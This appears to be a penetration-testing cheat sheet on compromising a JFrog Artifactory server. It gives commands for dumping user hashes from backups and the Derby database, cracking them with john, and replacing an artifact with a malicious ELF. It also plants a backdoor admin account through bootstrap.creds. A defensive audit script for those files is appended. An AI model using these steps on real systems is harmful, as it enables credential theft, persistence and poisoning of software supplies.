Artifactory (8081)

Artifactory is a “binary repository manager” that stores software packages and other binaries. Other binary repository managers include Apache Archiva, Sonatype Nexus, CloudRepo, and Cloudsmith.

- Enumerating Artifactory

ps aux | grep artifactory

If we’ve not yet gained access to the machine, we can try accessing the server externally from a web browser at port 8081, which is the default port for Artifactory’s web interface. If we have credentials, we can go to Artifactory > Artifacts and upload a payload (a malicious ELF) with the same name as an existing artifact that a target user has downloaded recently, then wait for the target to load it.

- Compromising Artifactory Backups

/{ARTIFACTORY FOLDER}/var/backup/access

We can inspect the user entries by reading the contents of one of these files, for example:

cat /opt/jfrog/artifactory/var/backup/access/access.backup.20200730120454.json

We can copy the bcrypt hashes into a file and try cracking them:

sudo john derbyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt

- Compromising Artifactory’s Database

Artifactory contains its own version of Java and we can use it to run the Derby connection utilities and connect to the database.

sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij

connect 'jdbc:derby:/tmp/hackeddb/derby';

select * from access_users;

- Adding a Secondary Artifactory Admin Account

First we navigate to the /opt/jfrog/artifactory/var/etc/access folder and create a creds file:

sudo bash -c 'echo "haxmin@*=haxhaxhax" > /opt/jfrog/artifactory/var/etc/access/bootstrap.creds'

This will create a new user called “haxmin” with a password of “haxhaxhax”. Next, we restrict the file’s permissions to its owner:

sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/bootstrap.creds

And then restart the Artifactory process:

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start
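
From the defender's side, both the access backups and a bootstrap.creds file are things to audit for on an Artifactory host. The script below is an added example, not part of the original page or of Artifactory itself; the function names are hypothetical, and it assumes the directory layout and the user@pattern=password line format shown above.

```shell
#!/bin/sh
# Added example: defensive audit of an Artifactory install directory.
# Usage: sh audit.sh /opt/jfrog/artifactory   (install path as used on this page)

# Report a bootstrap.creds file and the accounts it defines; never print passwords.
# Returns 1 if the file exists, 0 otherwise.
check_bootstrap_creds() {
    creds="$1/var/etc/access/bootstrap.creds"
    [ -e "$creds" ] || return 0
    echo "FINDING: $creds exists"
    # Line format shown on the page: user@host-pattern=password
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            '')    ;;                                        # blank line
            *@*=*) echo "  defines account: ${line%%@*}" ;;  # name only
            *)     echo "  unparsed line (content withheld)" ;;
        esac
    done < "$creds"
    return 1
}

# Report access backups that group or others can read (they hold bcrypt hashes).
# Returns 1 if any are found, 0 otherwise.
check_access_backups() {
    dir="$1/var/backup/access"
    [ -d "$dir" ] || return 0
    hits=$(find "$dir" -type f -name 'access.backup.*.json' \
               \( -perm -040 -o -perm -004 \))
    [ -n "$hits" ] || return 0
    echo "FINDING: access backups readable beyond their owner:"
    echo "$hits" | sed 's/^/  /'
    return 1
}

# Run both checks; the exit status is non-zero when anything was found.
audit() {
    rc=0
    check_bootstrap_creds "$1" || rc=1
    check_access_backups "$1" || rc=1
    return "$rc"
}

if [ "$#" -gt 0 ]; then audit "$1"; fi
```

Run on a schedule or from a file-integrity monitor, a non-zero exit status can feed an alert.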
